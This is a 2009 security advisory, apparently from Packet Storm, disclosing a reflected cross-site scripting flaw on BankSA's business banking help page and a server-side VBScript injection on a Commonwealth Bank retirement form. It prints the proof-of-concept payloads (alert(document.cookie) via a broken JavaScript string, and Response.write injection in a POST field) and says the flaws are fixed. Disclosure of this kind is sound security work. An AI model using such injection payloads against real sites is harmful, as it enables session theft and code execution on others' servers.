Australian Bank Cross Site Scripting

🗓️ 13 May 2009 00:00:00 · Reported by militan · Type: packetstorm
🔗 packetstormsecurity.com · 31 Views

Two Australian bank web sites are reported vulnerable: BankSA to reflected cross-site scripting (JavaScript injection via a query parameter), and Commonwealth Bank to server-side VBScript (ASP) injection allowing arbitrary VBScript to be executed on the server.

Code
`==============================================  
Security Advisory: Banks in Australia  
  
militan (Chia-Jun Lin)  
[email protected]  
http://adl.csie.ncu.edu.tw/~militan  
militan-c7.blogspot.com  
Advanced Defense Lab(ADL), NCU CSIE TAIWAN  
12th May, 2009  
==============================================  
  
  
I. VULNERABILITY  
-------------------------  
XSS  
Command Injection  
  
Banks below are vulnerable:  
BankSA. www.banksa.com.au  
Commonwealth Bank. www.commbank.com.au  
etc...  
  
II. DESCRIPTION  
-------------------------  
Some pages on these banks' web sites contain vulnerabilities that attackers can  
misuse. Via the command injection, an attacker can execute arbitrary VBScript  
on the server.  
  
In general, the security mechanisms of Australian bank web sites are in place.  
However, their architectures are larger and more complex than they need to be,  
and in such large architectures some pages do not validate their input  
properly.  
  
  
III. Detail & POC  
------------------------  
1. BankSA: XSS (JavaScript injection).  
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS  
BBO stands for "Business Banking Online"; the vulnerable parameter is "origin".  
  
If origin=CBS, the page immediately redirects to the link below.  
www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS  
  
However, if origin=CBS" (with a trailing double quote), the value is copied  
unescaped into a JavaScript string literal in the intermediate page, so the  
generated script is broken and the attacker controls what follows the quote:  
****javascript code generated in the intermediate page  
function focusWin()  
{  
window.focus();  
//var theUrl = window.location.pathname;  
//var pos = theUrl.indexOf("help.asp");  
//theUrl = theUrl.substr(0,pos);  
window.location.href = "http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS"";  
//document.write("http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS"");  
}  
window.onload = focusWin;  
****  
  
Exploit:  
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";%0a%0aalert(document.cookie);//  
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";}</script>%0a%0a<script>alert("Vulnerable")</script>  
POC:  
http://adl.csie.ncu.edu.tw/~militan/banksa1.jpg  
http://adl.csie.ncu.edu.tw/~militan/banksa2.jpg  
http://adl.csie.ncu.edu.tw/~militan/banksa3.jpg  
  
  
2. Commonwealth Bank: ASP command injection (server-side VBScript injection).  
Commbank provides many calculators and tools for evaluating a financial plan.  
The page below collects personal information and makes an appointment:  
www.commbank.com.au/retirement/_PRODUCTION/content/ffthinkabout.asp  
Almost all of its parameters are processed by VBScript on the server.  
  
Moreover, the page returns the interpreter's error message when the  
parameters are mangled, so an attacker can craft the exploit easily and then  
execute arbitrary VBScript on the server.  
  
Exploit:  
POST parameter: Whattodo (default: FillForm)  
FillForm & Response.write("ccccc")'  
FillForm & Response.write("ccccc") %0d%0a Response.write("kerker") '  
POC:  
http://adl.csie.ncu.edu.tw/~militan/commbank1.jpg  
http://adl.csie.ncu.edu.tw/~militan/commbank2.jpg  
http://adl.csie.ncu.edu.tw/~militan/commbank3.jpg  
http://adl.csie.ncu.edu.tw/~militan/commbank4.jpg  
  
  
IV. SOLUTION& CONCLUSION  
-------------------------  
Banks in AU should reduce the size of their web site architectures: either do  
not provide additional functions, or make sure that those functions are  
secure (validate every parameter and encode it for the context it is written  
into).  
  
The vulnerabilities have been fixed already.  
  
  
regards  
--  
militan  
Advanced Defense Lab, NCU Taiwan  
`
